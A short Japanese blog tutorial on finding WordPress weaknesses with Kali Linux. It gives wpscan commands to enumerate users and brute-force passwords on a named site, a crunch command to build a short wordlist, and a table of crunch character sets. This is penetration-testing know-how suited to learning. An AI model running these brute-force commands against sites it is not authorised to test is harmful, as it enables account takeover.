kaliでwordpressの脆弱性を見つける

ユーザー名をリストアップする

wpscan --url www.tounyuu.com --enumerate u

パスワードを総当たりする

wpscan --url www.tounyuu.com --usernames fyuneru0830hotmail-com hoge --passwords password.txt

password.txtを事前に作っておく必要がある

crunch 1 3 -f /usr/share/crunch/charset.lst lalpha-numeric > password.txt

これは小文字と数字で1から3桁を生成するっていう意味

詳しくは

——	——
hex-lower	小文字の16進数（0〜f）
hex-upper	大文字の16進数（0〜F）
——	——
numeric	0〜9までの数字
numeric-space	0〜9までの数字と半角スペース
——	——
symbols14	記号（!@#$%^&*()-_+=）
symbols14-space	記号（!@#$%^&*()-_+=）と半角スペース
——	——
symbols-all	記号（!@#$%^&*()-_+=~`[]{}\|\:;”‘<>,.?/）
symbols-all-space	記号（!@#$%^&*()-_+=~`[]{}\|\:;”‘<>,.?/）と半角スペース
——	——
ualpha	大文字のアルファベット
ualpha-space	大文字のアルファベットと半角スペース
ualpha-numeric	大文字のアルファベットと数字
ualpha-numeric-space	大文字のアルファベットと数字と半角スペース
ualpha-numeric-symbol14	大文字のアルファベットと数字と記号（!@#$%^&*()-_+=）
ualpha-numeric-symbol14-space	大文字のアルファベットと数字と記号（!@#$%^&*()-_+=）と半角スペース
ualpha-numeric-all	大文字のアルファベットと数字と記号（!@#$%^&*()-_+=~`[]{}\|\:;”‘<>,.?/）
ualpha-numeric-all-space	大文字のアルファベットと数字と記号（!@#$%^&*()-_+=~`[]{}\|\:;”‘<>,.?/）と半角スペース
——	——
lalpha	小文字のアルファベット
lalpha-space	小文字のアルファベットと半角スペース
lalpha-numeric	小文字のアルファベットと数字
lalpha-numeric-space	小文字のアルファベットと数字と半角スペース
lalpha-numeric-symbol14	小文字のアルファベットと数字と記号（!@#$%^&*()-_+=）
lalpha-numeric-symbol14-space	小文字のアルファベットと数字と記号（!@#$%^&*()-_+=）と半角スペース
lalpha-numeric-all	小文字のアルファベットと数字と記号（!@#$%^&*()-_+=~`[]{}\|\:;”‘<>,.?/）
lalpha-numeric-all-space	小文字のアルファベットと数字と記号（!@#$%^&*()-_+=~`[]{}\|\:;”‘<>,.?/）と半角スペース
——	——
mixalpha	アルファベット
mixalpha-space	アルファベットと半角スペース
mixalpha-numeric	アルファベットと数字
mixalpha-numeric-space	アルファベットと数字と半角スペース
mixalpha-numeric-symbol14	アルファベットと数字と記号（!@#$%^&*()-_+=）
mixalpha-numeric-symbol14-space	アルファベットと数字と記号（!@#$%^&*()-_+=）と半角スペース
mixalpha-numeric-all	アルファベットと数字と記号（!@#$%^&*()-_+=~`[]{}\|\:;”‘<>,.?/）
mixalpha-numeric-all-space	アルファベットと数字と記号（!@#$%^&*()-_+=~`[]{}\|\:;”‘<>,.?/）と半角スペース

を参照。

Crunch】Macで総当たり用のパスワードリストを作成する方法
https://original-game.com/mini_howto/how-to-use-crunch-on-mac/

kaliでwordpressの脆弱性を見つける

大豆

Author

記事

Leave a Reply Cancel